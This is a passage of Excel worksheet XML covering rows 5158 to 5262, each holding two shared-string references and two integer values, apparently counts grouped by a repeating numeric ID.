      </c>
    </row>
    <row r="5158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5158" t="s">
        <v>16228</v>
      </c>
      <c r="B5158" t="s">
        <v>16215</v>
      </c>
      <c r="C5158">
        <v>3</v>
      </c>
      <c r="D5158">
        <v>593</v>
      </c>
    </row>
    <row r="5159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5159" t="s">
        <v>16231</v>
      </c>
      <c r="B5159" t="s">
        <v>16216</v>
      </c>
      <c r="C5159">
        <v>2</v>
      </c>
      <c r="D5159">
        <v>593</v>
      </c>
    </row>
    <row r="5160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5160" t="s">
        <v>16228</v>
      </c>
      <c r="B5160" t="s">
        <v>16217</v>
      </c>
      <c r="C5160">
        <v>1</v>
      </c>
      <c r="D5160">
        <v>593</v>
      </c>
    </row>
    <row r="5161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5161" t="s">
        <v>16231</v>
      </c>
      <c r="B5161" t="s">
        <v>16218</v>
      </c>
      <c r="C5161">
        <v>0</v>
      </c>
      <c r="D5161">
        <v>593</v>
      </c>
    </row>
    <row r="5162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5162" t="s">
        <v>16229</v>
      </c>
      <c r="B5162" t="s">
        <v>16219</v>
      </c>
      <c r="C5162">
        <v>0</v>
      </c>
      <c r="D5162">
        <v>593</v>
      </c>
    </row>
    <row r="5163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5163" t="s">
        <v>16230</v>
      </c>
      <c r="B5163" t="s">
        <v>16220</v>
      </c>
      <c r="C5163">
        <v>0</v>
      </c>
      <c r="D5163">
        <v>593</v>
      </c>
    </row>
    <row r="5164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5164" t="s">
        <v>16229</v>
      </c>
      <c r="B5164" t="s">
        <v>16221</v>
      </c>
      <c r="C5164">
        <v>6</v>
      </c>
      <c r="D5164">
        <v>593</v>
      </c>
    </row>
    <row r="5165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5165" t="s">
        <v>16230</v>
      </c>
      <c r="B5165" t="s">
        <v>16222</v>
      </c>
      <c r="C5165">
        <v>0</v>
      </c>
      <c r="D5165">
        <v>593</v>
      </c>
    </row>
    <row r="5166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5166" t="s">
        <v>16223</v>
      </c>
      <c r="B5166" t="s">
        <v>16223</v>
      </c>
      <c r="C5166">
        <v>26</v>
      </c>
      <c r="D5166">
        <v>593</v>
      </c>
    </row>
    <row r="5167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5167" t="s">
        <v>16224</v>
      </c>
      <c r="B5167" t="s">
        <v>16224</v>
      </c>
      <c r="C5167">
        <v>1</v>
      </c>
      <c r="D5167">
        <v>593</v>
      </c>
    </row>
    <row r="5168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5168" t="s">
        <v>16228</v>
      </c>
      <c r="B5168" t="s">
        <v>16211</v>
      </c>
      <c r="C5168">
        <v>1</v>
      </c>
      <c r="D5168">
        <v>2107</v>
      </c>
    </row>
    <row r="5169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5169" t="s">
        <v>16231</v>
      </c>
      <c r="B5169" t="s">
        <v>16212</v>
      </c>
      <c r="C5169">
        <v>0</v>
      </c>
      <c r="D5169">
        <v>2107</v>
      </c>
    </row>
    <row r="5170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5170" t="s">
        <v>16228</v>
      </c>
      <c r="B5170" t="s">
        <v>16213</v>
      </c>
      <c r="C5170">
        <v>6</v>
      </c>
      <c r="D5170">
        <v>2107</v>
      </c>
    </row>
    <row r="5171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5171" t="s">
        <v>16231</v>
      </c>
      <c r="B5171" t="s">
        <v>16214</v>
      </c>
      <c r="C5171">
        <v>0</v>
      </c>
      <c r="D5171">
        <v>2107</v>
      </c>
    </row>
    <row r="5172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5172" t="s">
        <v>16228</v>
      </c>
      <c r="B5172" t="s">
        <v>16215</v>
      </c>
      <c r="C5172">
        <v>2</v>
      </c>
      <c r="D5172">
        <v>2107</v>
      </c>
    </row>
    <row r="5173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5173" t="s">
        <v>16231</v>
      </c>
      <c r="B5173" t="s">
        <v>16216</v>
      </c>
      <c r="C5173">
        <v>5</v>
      </c>
      <c r="D5173">
        <v>2107</v>
      </c>
    </row>
    <row r="5174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5174" t="s">
        <v>16228</v>
      </c>
      <c r="B5174" t="s">
        <v>16217</v>
      </c>
      <c r="C5174">
        <v>30</v>
      </c>
      <c r="D5174">
        <v>2107</v>
      </c>
    </row>
    <row r="5175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5175" t="s">
        <v>16231</v>
      </c>
      <c r="B5175" t="s">
        <v>16218</v>
      </c>
      <c r="C5175">
        <v>2</v>
      </c>
      <c r="D5175">
        <v>2107</v>
      </c>
    </row>
    <row r="5176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5176" t="s">
        <v>16229</v>
      </c>
      <c r="B5176" t="s">
        <v>16219</v>
      </c>
      <c r="C5176">
        <v>0</v>
      </c>
      <c r="D5176">
        <v>2107</v>
      </c>
    </row>
    <row r="5177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5177" t="s">
        <v>16230</v>
      </c>
      <c r="B5177" t="s">
        <v>16220</v>
      </c>
      <c r="C5177">
        <v>0</v>
      </c>
      <c r="D5177">
        <v>2107</v>
      </c>
    </row>
    <row r="5178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5178" t="s">
        <v>16229</v>
      </c>
      <c r="B5178" t="s">
        <v>16221</v>
      </c>
      <c r="C5178">
        <v>16</v>
      </c>
      <c r="D5178">
        <v>2107</v>
      </c>
    </row>
    <row r="5179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5179" t="s">
        <v>16230</v>
      </c>
      <c r="B5179" t="s">
        <v>16222</v>
      </c>
      <c r="C5179">
        <v>23</v>
      </c>
      <c r="D5179">
        <v>2107</v>
      </c>
    </row>
    <row r="5180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5180" t="s">
        <v>16223</v>
      </c>
      <c r="B5180" t="s">
        <v>16223</v>
      </c>
      <c r="C5180">
        <v>26</v>
      </c>
      <c r="D5180">
        <v>2107</v>
      </c>
    </row>
    <row r="5181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5181" t="s">
        <v>16224</v>
      </c>
      <c r="B5181" t="s">
        <v>16224</v>
      </c>
      <c r="C5181">
        <v>3</v>
      </c>
      <c r="D5181">
        <v>2107</v>
      </c>
    </row>
    <row r="5182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5182" t="s">
        <v>16228</v>
      </c>
      <c r="B5182" t="s">
        <v>16211</v>
      </c>
      <c r="C5182">
        <v>0</v>
      </c>
      <c r="D5182">
        <v>532</v>
      </c>
    </row>
    <row r="5183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5183" t="s">
        <v>16231</v>
      </c>
      <c r="B5183" t="s">
        <v>16212</v>
      </c>
      <c r="C5183">
        <v>0</v>
      </c>
      <c r="D5183">
        <v>532</v>
      </c>
    </row>
    <row r="5184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5184" t="s">
        <v>16228</v>
      </c>
      <c r="B5184" t="s">
        <v>16213</v>
      </c>
      <c r="C5184">
        <v>0</v>
      </c>
      <c r="D5184">
        <v>532</v>
      </c>
    </row>
    <row r="5185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5185" t="s">
        <v>16231</v>
      </c>
      <c r="B5185" t="s">
        <v>16214</v>
      </c>
      <c r="C5185">
        <v>0</v>
      </c>
      <c r="D5185">
        <v>532</v>
      </c>
    </row>
    <row r="5186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5186" t="s">
        <v>16228</v>
      </c>
      <c r="B5186" t="s">
        <v>16215</v>
      </c>
      <c r="C5186">
        <v>7</v>
      </c>
      <c r="D5186">
        <v>532</v>
      </c>
    </row>
    <row r="5187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5187" t="s">
        <v>16231</v>
      </c>
      <c r="B5187" t="s">
        <v>16216</v>
      </c>
      <c r="C5187">
        <v>8</v>
      </c>
      <c r="D5187">
        <v>532</v>
      </c>
    </row>
    <row r="5188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5188" t="s">
        <v>16228</v>
      </c>
      <c r="B5188" t="s">
        <v>16217</v>
      </c>
      <c r="C5188">
        <v>4</v>
      </c>
      <c r="D5188">
        <v>532</v>
      </c>
    </row>
    <row r="5189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5189" t="s">
        <v>16231</v>
      </c>
      <c r="B5189" t="s">
        <v>16218</v>
      </c>
      <c r="C5189">
        <v>0</v>
      </c>
      <c r="D5189">
        <v>532</v>
      </c>
    </row>
    <row r="5190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5190" t="s">
        <v>16229</v>
      </c>
      <c r="B5190" t="s">
        <v>16219</v>
      </c>
      <c r="C5190">
        <v>0</v>
      </c>
      <c r="D5190">
        <v>532</v>
      </c>
    </row>
    <row r="5191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5191" t="s">
        <v>16230</v>
      </c>
      <c r="B5191" t="s">
        <v>16220</v>
      </c>
      <c r="C5191">
        <v>0</v>
      </c>
      <c r="D5191">
        <v>532</v>
      </c>
    </row>
    <row r="5192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5192" t="s">
        <v>16229</v>
      </c>
      <c r="B5192" t="s">
        <v>16221</v>
      </c>
      <c r="C5192">
        <v>28</v>
      </c>
      <c r="D5192">
        <v>532</v>
      </c>
    </row>
    <row r="5193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5193" t="s">
        <v>16230</v>
      </c>
      <c r="B5193" t="s">
        <v>16222</v>
      </c>
      <c r="C5193">
        <v>4</v>
      </c>
      <c r="D5193">
        <v>532</v>
      </c>
    </row>
    <row r="5194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5194" t="s">
        <v>16223</v>
      </c>
      <c r="B5194" t="s">
        <v>16223</v>
      </c>
      <c r="C5194">
        <v>26</v>
      </c>
      <c r="D5194">
        <v>532</v>
      </c>
    </row>
    <row r="5195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5195" t="s">
        <v>16224</v>
      </c>
      <c r="B5195" t="s">
        <v>16224</v>
      </c>
      <c r="C5195">
        <v>1</v>
      </c>
      <c r="D5195">
        <v>532</v>
      </c>
    </row>
    <row r="5196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5196" t="s">
        <v>16228</v>
      </c>
      <c r="B5196" t="s">
        <v>16211</v>
      </c>
      <c r="C5196">
        <v>0</v>
      </c>
      <c r="D5196">
        <v>2735</v>
      </c>
    </row>
    <row r="5197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5197" t="s">
        <v>16231</v>
      </c>
      <c r="B5197" t="s">
        <v>16212</v>
      </c>
      <c r="C5197">
        <v>0</v>
      </c>
      <c r="D5197">
        <v>2735</v>
      </c>
    </row>
    <row r="5198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5198" t="s">
        <v>16228</v>
      </c>
      <c r="B5198" t="s">
        <v>16213</v>
      </c>
      <c r="C5198">
        <v>0</v>
      </c>
      <c r="D5198">
        <v>2735</v>
      </c>
    </row>
    <row r="5199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5199" t="s">
        <v>16231</v>
      </c>
      <c r="B5199" t="s">
        <v>16214</v>
      </c>
      <c r="C5199">
        <v>0</v>
      </c>
      <c r="D5199">
        <v>2735</v>
      </c>
    </row>
    <row r="5200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5200" t="s">
        <v>16228</v>
      </c>
      <c r="B5200" t="s">
        <v>16215</v>
      </c>
      <c r="C5200">
        <v>2</v>
      </c>
      <c r="D5200">
        <v>2735</v>
      </c>
    </row>
    <row r="5201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5201" t="s">
        <v>16231</v>
      </c>
      <c r="B5201" t="s">
        <v>16216</v>
      </c>
      <c r="C5201">
        <v>2</v>
      </c>
      <c r="D5201">
        <v>2735</v>
      </c>
    </row>
    <row r="5202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5202" t="s">
        <v>16228</v>
      </c>
      <c r="B5202" t="s">
        <v>16217</v>
      </c>
      <c r="C5202">
        <v>5</v>
      </c>
      <c r="D5202">
        <v>2735</v>
      </c>
    </row>
    <row r="5203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5203" t="s">
        <v>16231</v>
      </c>
      <c r="B5203" t="s">
        <v>16218</v>
      </c>
      <c r="C5203">
        <v>1</v>
      </c>
      <c r="D5203">
        <v>2735</v>
      </c>
    </row>
    <row r="5204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5204" t="s">
        <v>16229</v>
      </c>
      <c r="B5204" t="s">
        <v>16219</v>
      </c>
      <c r="C5204">
        <v>0</v>
      </c>
      <c r="D5204">
        <v>2735</v>
      </c>
    </row>
    <row r="5205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5205" t="s">
        <v>16230</v>
      </c>
      <c r="B5205" t="s">
        <v>16220</v>
      </c>
      <c r="C5205">
        <v>0</v>
      </c>
      <c r="D5205">
        <v>2735</v>
      </c>
    </row>
    <row r="5206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5206" t="s">
        <v>16229</v>
      </c>
      <c r="B5206" t="s">
        <v>16221</v>
      </c>
      <c r="C5206">
        <v>10</v>
      </c>
      <c r="D5206">
        <v>2735</v>
      </c>
    </row>
    <row r="5207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5207" t="s">
        <v>16230</v>
      </c>
      <c r="B5207" t="s">
        <v>16222</v>
      </c>
      <c r="C5207">
        <v>10</v>
      </c>
      <c r="D5207">
        <v>2735</v>
      </c>
    </row>
    <row r="5208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5208" t="s">
        <v>16223</v>
      </c>
      <c r="B5208" t="s">
        <v>16223</v>
      </c>
      <c r="C5208">
        <v>26</v>
      </c>
      <c r="D5208">
        <v>2735</v>
      </c>
    </row>
    <row r="5209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5209" t="s">
        <v>16224</v>
      </c>
      <c r="B5209" t="s">
        <v>16224</v>
      </c>
      <c r="C5209">
        <v>0</v>
      </c>
      <c r="D5209">
        <v>2735</v>
      </c>
    </row>
    <row r="5210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5210" t="s">
        <v>16228</v>
      </c>
      <c r="B5210" t="s">
        <v>16211</v>
      </c>
      <c r="C5210">
        <v>0</v>
      </c>
      <c r="D5210">
        <v>2753</v>
      </c>
    </row>
    <row r="5211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5211" t="s">
        <v>16231</v>
      </c>
      <c r="B5211" t="s">
        <v>16212</v>
      </c>
      <c r="C5211">
        <v>0</v>
      </c>
      <c r="D5211">
        <v>2753</v>
      </c>
    </row>
    <row r="5212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5212" t="s">
        <v>16228</v>
      </c>
      <c r="B5212" t="s">
        <v>16213</v>
      </c>
      <c r="C5212">
        <v>0</v>
      </c>
      <c r="D5212">
        <v>2753</v>
      </c>
    </row>
    <row r="5213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5213" t="s">
        <v>16231</v>
      </c>
      <c r="B5213" t="s">
        <v>16214</v>
      </c>
      <c r="C5213">
        <v>0</v>
      </c>
      <c r="D5213">
        <v>2753</v>
      </c>
    </row>
    <row r="5214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5214" t="s">
        <v>16228</v>
      </c>
      <c r="B5214" t="s">
        <v>16215</v>
      </c>
      <c r="C5214">
        <v>0</v>
      </c>
      <c r="D5214">
        <v>2753</v>
      </c>
    </row>
    <row r="5215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5215" t="s">
        <v>16231</v>
      </c>
      <c r="B5215" t="s">
        <v>16216</v>
      </c>
      <c r="C5215">
        <v>1</v>
      </c>
      <c r="D5215">
        <v>2753</v>
      </c>
    </row>
    <row r="5216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5216" t="s">
        <v>16228</v>
      </c>
      <c r="B5216" t="s">
        <v>16217</v>
      </c>
      <c r="C5216">
        <v>0</v>
      </c>
      <c r="D5216">
        <v>2753</v>
      </c>
    </row>
    <row r="5217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5217" t="s">
        <v>16231</v>
      </c>
      <c r="B5217" t="s">
        <v>16218</v>
      </c>
      <c r="C5217">
        <v>3</v>
      </c>
      <c r="D5217">
        <v>2753</v>
      </c>
    </row>
    <row r="5218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5218" t="s">
        <v>16229</v>
      </c>
      <c r="B5218" t="s">
        <v>16219</v>
      </c>
      <c r="C5218">
        <v>0</v>
      </c>
      <c r="D5218">
        <v>2753</v>
      </c>
    </row>
    <row r="5219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5219" t="s">
        <v>16230</v>
      </c>
      <c r="B5219" t="s">
        <v>16220</v>
      </c>
      <c r="C5219">
        <v>0</v>
      </c>
      <c r="D5219">
        <v>2753</v>
      </c>
    </row>
    <row r="5220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5220" t="s">
        <v>16229</v>
      </c>
      <c r="B5220" t="s">
        <v>16221</v>
      </c>
      <c r="C5220">
        <v>0</v>
      </c>
      <c r="D5220">
        <v>2753</v>
      </c>
    </row>
    <row r="5221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5221" t="s">
        <v>16230</v>
      </c>
      <c r="B5221" t="s">
        <v>16222</v>
      </c>
      <c r="C5221">
        <v>0</v>
      </c>
      <c r="D5221">
        <v>2753</v>
      </c>
    </row>
    <row r="5222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5222" t="s">
        <v>16223</v>
      </c>
      <c r="B5222" t="s">
        <v>16223</v>
      </c>
      <c r="C5222">
        <v>16</v>
      </c>
      <c r="D5222">
        <v>2753</v>
      </c>
    </row>
    <row r="5223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5223" t="s">
        <v>16224</v>
      </c>
      <c r="B5223" t="s">
        <v>16224</v>
      </c>
      <c r="C5223">
        <v>1</v>
      </c>
      <c r="D5223">
        <v>2753</v>
      </c>
    </row>
    <row r="5224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5224" t="s">
        <v>16228</v>
      </c>
      <c r="B5224" t="s">
        <v>16211</v>
      </c>
      <c r="C5224">
        <v>0</v>
      </c>
      <c r="D5224">
        <v>160</v>
      </c>
    </row>
    <row r="5225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5225" t="s">
        <v>16231</v>
      </c>
      <c r="B5225" t="s">
        <v>16212</v>
      </c>
      <c r="C5225">
        <v>0</v>
      </c>
      <c r="D5225">
        <v>160</v>
      </c>
    </row>
    <row r="5226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5226" t="s">
        <v>16228</v>
      </c>
      <c r="B5226" t="s">
        <v>16213</v>
      </c>
      <c r="C5226">
        <v>0</v>
      </c>
      <c r="D5226">
        <v>160</v>
      </c>
    </row>
    <row r="5227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5227" t="s">
        <v>16231</v>
      </c>
      <c r="B5227" t="s">
        <v>16214</v>
      </c>
      <c r="C5227">
        <v>0</v>
      </c>
      <c r="D5227">
        <v>160</v>
      </c>
    </row>
    <row r="5228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5228" t="s">
        <v>16228</v>
      </c>
      <c r="B5228" t="s">
        <v>16215</v>
      </c>
      <c r="C5228">
        <v>0</v>
      </c>
      <c r="D5228">
        <v>160</v>
      </c>
    </row>
    <row r="5229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5229" t="s">
        <v>16231</v>
      </c>
      <c r="B5229" t="s">
        <v>16216</v>
      </c>
      <c r="C5229">
        <v>2</v>
      </c>
      <c r="D5229">
        <v>160</v>
      </c>
    </row>
    <row r="5230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5230" t="s">
        <v>16228</v>
      </c>
      <c r="B5230" t="s">
        <v>16217</v>
      </c>
      <c r="C5230">
        <v>9</v>
      </c>
      <c r="D5230">
        <v>160</v>
      </c>
    </row>
    <row r="5231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5231" t="s">
        <v>16231</v>
      </c>
      <c r="B5231" t="s">
        <v>16218</v>
      </c>
      <c r="C5231">
        <v>8</v>
      </c>
      <c r="D5231">
        <v>160</v>
      </c>
    </row>
    <row r="5232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5232" t="s">
        <v>16229</v>
      </c>
      <c r="B5232" t="s">
        <v>16219</v>
      </c>
      <c r="C5232">
        <v>0</v>
      </c>
      <c r="D5232">
        <v>160</v>
      </c>
    </row>
    <row r="5233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5233" t="s">
        <v>16230</v>
      </c>
      <c r="B5233" t="s">
        <v>16220</v>
      </c>
      <c r="C5233">
        <v>0</v>
      </c>
      <c r="D5233">
        <v>160</v>
      </c>
    </row>
    <row r="5234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5234" t="s">
        <v>16229</v>
      </c>
      <c r="B5234" t="s">
        <v>16221</v>
      </c>
      <c r="C5234">
        <v>2</v>
      </c>
      <c r="D5234">
        <v>160</v>
      </c>
    </row>
    <row r="5235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5235" t="s">
        <v>16230</v>
      </c>
      <c r="B5235" t="s">
        <v>16222</v>
      </c>
      <c r="C5235">
        <v>8</v>
      </c>
      <c r="D5235">
        <v>160</v>
      </c>
    </row>
    <row r="5236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5236" t="s">
        <v>16223</v>
      </c>
      <c r="B5236" t="s">
        <v>16223</v>
      </c>
      <c r="C5236">
        <v>26</v>
      </c>
      <c r="D5236">
        <v>160</v>
      </c>
    </row>
    <row r="5237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5237" t="s">
        <v>16224</v>
      </c>
      <c r="B5237" t="s">
        <v>16224</v>
      </c>
      <c r="C5237">
        <v>0</v>
      </c>
      <c r="D5237">
        <v>160</v>
      </c>
    </row>
    <row r="5238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5238" t="s">
        <v>16228</v>
      </c>
      <c r="B5238" t="s">
        <v>16211</v>
      </c>
      <c r="C5238">
        <v>0</v>
      </c>
      <c r="D5238">
        <v>758</v>
      </c>
    </row>
    <row r="5239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5239" t="s">
        <v>16231</v>
      </c>
      <c r="B5239" t="s">
        <v>16212</v>
      </c>
      <c r="C5239">
        <v>0</v>
      </c>
      <c r="D5239">
        <v>758</v>
      </c>
    </row>
    <row r="5240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5240" t="s">
        <v>16228</v>
      </c>
      <c r="B5240" t="s">
        <v>16213</v>
      </c>
      <c r="C5240">
        <v>0</v>
      </c>
      <c r="D5240">
        <v>758</v>
      </c>
    </row>
    <row r="5241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5241" t="s">
        <v>16231</v>
      </c>
      <c r="B5241" t="s">
        <v>16214</v>
      </c>
      <c r="C5241">
        <v>0</v>
      </c>
      <c r="D5241">
        <v>758</v>
      </c>
    </row>
    <row r="5242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5242" t="s">
        <v>16228</v>
      </c>
      <c r="B5242" t="s">
        <v>16215</v>
      </c>
      <c r="C5242">
        <v>0</v>
      </c>
      <c r="D5242">
        <v>758</v>
      </c>
    </row>
    <row r="5243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5243" t="s">
        <v>16231</v>
      </c>
      <c r="B5243" t="s">
        <v>16216</v>
      </c>
      <c r="C5243">
        <v>1</v>
      </c>
      <c r="D5243">
        <v>758</v>
      </c>
    </row>
    <row r="5244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5244" t="s">
        <v>16228</v>
      </c>
      <c r="B5244" t="s">
        <v>16217</v>
      </c>
      <c r="C5244">
        <v>8</v>
      </c>
      <c r="D5244">
        <v>758</v>
      </c>
    </row>
    <row r="5245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5245" t="s">
        <v>16231</v>
      </c>
      <c r="B5245" t="s">
        <v>16218</v>
      </c>
      <c r="C5245">
        <v>0</v>
      </c>
      <c r="D5245">
        <v>758</v>
      </c>
    </row>
    <row r="5246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5246" t="s">
        <v>16229</v>
      </c>
      <c r="B5246" t="s">
        <v>16219</v>
      </c>
      <c r="C5246">
        <v>0</v>
      </c>
      <c r="D5246">
        <v>758</v>
      </c>
    </row>
    <row r="5247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5247" t="s">
        <v>16230</v>
      </c>
      <c r="B5247" t="s">
        <v>16220</v>
      </c>
      <c r="C5247">
        <v>0</v>
      </c>
      <c r="D5247">
        <v>758</v>
      </c>
    </row>
    <row r="5248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5248" t="s">
        <v>16229</v>
      </c>
      <c r="B5248" t="s">
        <v>16221</v>
      </c>
      <c r="C5248">
        <v>1</v>
      </c>
      <c r="D5248">
        <v>758</v>
      </c>
    </row>
    <row r="5249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5249" t="s">
        <v>16230</v>
      </c>
      <c r="B5249" t="s">
        <v>16222</v>
      </c>
      <c r="C5249">
        <v>15</v>
      </c>
      <c r="D5249">
        <v>758</v>
      </c>
    </row>
    <row r="5250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5250" t="s">
        <v>16223</v>
      </c>
      <c r="B5250" t="s">
        <v>16223</v>
      </c>
      <c r="C5250">
        <v>25</v>
      </c>
      <c r="D5250">
        <v>758</v>
      </c>
    </row>
    <row r="5251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5251" t="s">
        <v>16224</v>
      </c>
      <c r="B5251" t="s">
        <v>16224</v>
      </c>
      <c r="C5251">
        <v>1</v>
      </c>
      <c r="D5251">
        <v>758</v>
      </c>
    </row>
    <row r="5252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5252" t="s">
        <v>16228</v>
      </c>
      <c r="B5252" t="s">
        <v>16211</v>
      </c>
      <c r="C5252">
        <v>0</v>
      </c>
      <c r="D5252">
        <v>244</v>
      </c>
    </row>
    <row r="5253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5253" t="s">
        <v>16231</v>
      </c>
      <c r="B5253" t="s">
        <v>16212</v>
      </c>
      <c r="C5253">
        <v>0</v>
      </c>
      <c r="D5253">
        <v>244</v>
      </c>
    </row>
    <row r="5254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5254" t="s">
        <v>16228</v>
      </c>
      <c r="B5254" t="s">
        <v>16213</v>
      </c>
      <c r="C5254">
        <v>0</v>
      </c>
      <c r="D5254">
        <v>244</v>
      </c>
    </row>
    <row r="5255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5255" t="s">
        <v>16231</v>
      </c>
      <c r="B5255" t="s">
        <v>16214</v>
      </c>
      <c r="C5255">
        <v>0</v>
      </c>
      <c r="D5255">
        <v>244</v>
      </c>
    </row>
    <row r="5256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5256" t="s">
        <v>16228</v>
      </c>
      <c r="B5256" t="s">
        <v>16215</v>
      </c>
      <c r="C5256">
        <v>0</v>
      </c>
      <c r="D5256">
        <v>244</v>
      </c>
    </row>
    <row r="5257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5257" t="s">
        <v>16231</v>
      </c>
      <c r="B5257" t="s">
        <v>16216</v>
      </c>
      <c r="C5257">
        <v>5</v>
      </c>
      <c r="D5257">
        <v>244</v>
      </c>
    </row>
    <row r="5258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5258" t="s">
        <v>16228</v>
      </c>
      <c r="B5258" t="s">
        <v>16217</v>
      </c>
      <c r="C5258">
        <v>6</v>
      </c>
      <c r="D5258">
        <v>244</v>
      </c>
    </row>
    <row r="5259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5259" t="s">
        <v>16231</v>
      </c>
      <c r="B5259" t="s">
        <v>16218</v>
      </c>
      <c r="C5259">
        <v>0</v>
      </c>
      <c r="D5259">
        <v>244</v>
      </c>
    </row>
    <row r="5260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5260" t="s">
        <v>16229</v>
      </c>
      <c r="B5260" t="s">
        <v>16219</v>
      </c>
      <c r="C5260">
        <v>0</v>
      </c>
      <c r="D5260">
        <v>244</v>
      </c>
    </row>
    <row r="5261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5261" t="s">
        <v>16230</v>
      </c>
      <c r="B5261" t="s">
        <v>16220</v>
      </c>
      <c r="C5261">
        <v>0</v>
      </c>
      <c r="D5261">
        <v>244</v>
      </c>
    </row>
    <row r="5262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5262" t="s">
        <v>16229</v>
      </c>
      <c r="B5262" t="s">
        <v>16221</v>
      </c>
      <c r="C5262">
        <v>10</v>
      </c>
      <c r="D5262">
        <v>244</v>
      </c>
    </row>
    <row r="5263" spans="1:4" x14ac:dyDescent="0.2">
